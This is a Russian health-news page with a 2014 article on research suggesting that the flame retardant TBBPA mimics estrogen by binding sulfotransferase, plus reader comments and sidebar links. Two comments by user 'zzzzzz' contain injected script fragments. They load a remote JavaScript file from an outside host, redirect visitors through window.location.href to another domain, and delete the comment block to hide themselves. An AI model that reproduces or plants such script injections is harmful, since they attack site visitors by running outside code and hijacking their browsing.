Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Огнеупорные материалы мог...  >>  Огнеупорные материалы могут сделать из мужчин женщин
 
Обратная связь
 

Огнеупорные материалы могут сделать из мужчин женщин

Размер шрифта
26 июня 2014 00:00
Юрий Малышев
Здоровье инфо
Полина Калинина
Здоровье инфо
  • google_analytics: false
  • Нравится

Благодаря 3D-визуализации белков, ученые выяснили, что бромсодержащие антипирены, которые широко используются в качестве огнеупорных материалов, могут имитировать гормоны эстрогена в организме человека и вызывать гормональные нарушения.

Огнеупорные материалы могут сделать из мужчин женщин

«Мы начинаем понимать, как антипирены действуют на организм человека, – говорит доктор Линда Бирнбаум, директор Национального института наук об окружающей среде. – Используя 3D-технологии, мы можем буквально видеть, как огнеупорные вещества, попадая в организм человека, связываются с различными белками, подобно эстрогенам».

Бирнбаум возглавила исследование безопасности огнеупорных веществ в рамках Национальной программы по токсикологии. Она собрала команду из биологов и врачей, которые изучали один из наиболее распространенных антипиренов – тетрабромбисфенол А (TBBPA). Ранее были опубликованы данные о том, что это вещество вызывает опухоли у крыс и мышей.

Дело в том, что антипирены в организме человека связываются с ферментом сульфотрансферазой, участвующими в метаболизме эстрогена и угнетают его. В результате в организме накапливается слишком много эстрогена.

Существуют сотни различных огнеупорных веществ, которые подразделяются на классы по своей химической структуре. Бромсодержащие антипирены используются в производстве электроники, мебели, строительных материалов, автомобилей и других. В настоящее время ведутся исследования их влияния на эндокринную, иммунную, репродуктивную и нервную системы.

В данном исследовании использовалась рентгеновская кристаллография для построения модели активности антипиренов в организме. Кристаллография позволяет понять структуру веществ с точностью до атомов, а также визуализировать их взаимодействие с ферментами. Ученые исследовали, как TBBPA и его производное BDE-47 (BDE-47) связываются с сульфотрансферазой по сравнению с натуральным эстрогеном. В частности, было выяснено, что ТВВРА взаимодействует с сульфотрансферазой абсолютно так же, как и гормон эстрадиол.

Многие антипирены, включая BDE-47, больше не производятся в некоторых странах, например, в США, однако они долгое время сохраняются в окружающей среде. Люди могут контактировать с этими веществами через продукты питания, предметы обихода, автомобили, пыль и другие.

«Разумеется, нам предстоит еще долгая работа, чтобы выяснить, как антипирены и их производные ведут себя в организме, – говорят исследователи. – Однако мы надеемся, что собрали хотя бы кусочек этого паззла».

Хотите узнать еще больше о материалах, которые вас окружают? Читайте наш спецпроект «Насколько токсичен мой дом».

Данные материалы основаны на публикациях Национального института окружающей среды, США.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

26 июня 2014 в 16:24

Цитировать   |   Пожаловаться

в нашей стране такие антипирены НЕ ИСПОЛЬЗУЮТСЯ!

У нас - совсем другие, голая неорганика, содержащая фосфаты, аммиак, например.

2 - zzzzzz

30 июня 2015 в 18:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:34

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Перезапусти свои гормоны   Ум или секс? Женщины против мужчин?   Как не заболеть? Самые грязные общественные места!   Как секс избавит вас от врачей  
25 февраля 2013Теперь при приеме на работу вы должны будете плюнуть 17 июня 2013Мужской гормон страсти повышается, когда он выигрывает в игру!
 
22 февраля 2013Настоящий мужчина всегда говорит правду 09 ноября 2012Кастрация продлевает жизнь
 

Слайдшоу

1
Как действительно избавиться от всех микробов. Часть 2
Вся правда о тестостероне
Гормональный сбой: симптомы и лечение

Тесты

1
Есть ли у вас гормональные нарушения
Яички – удивительный орган
Как подобрать контрацептивы?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.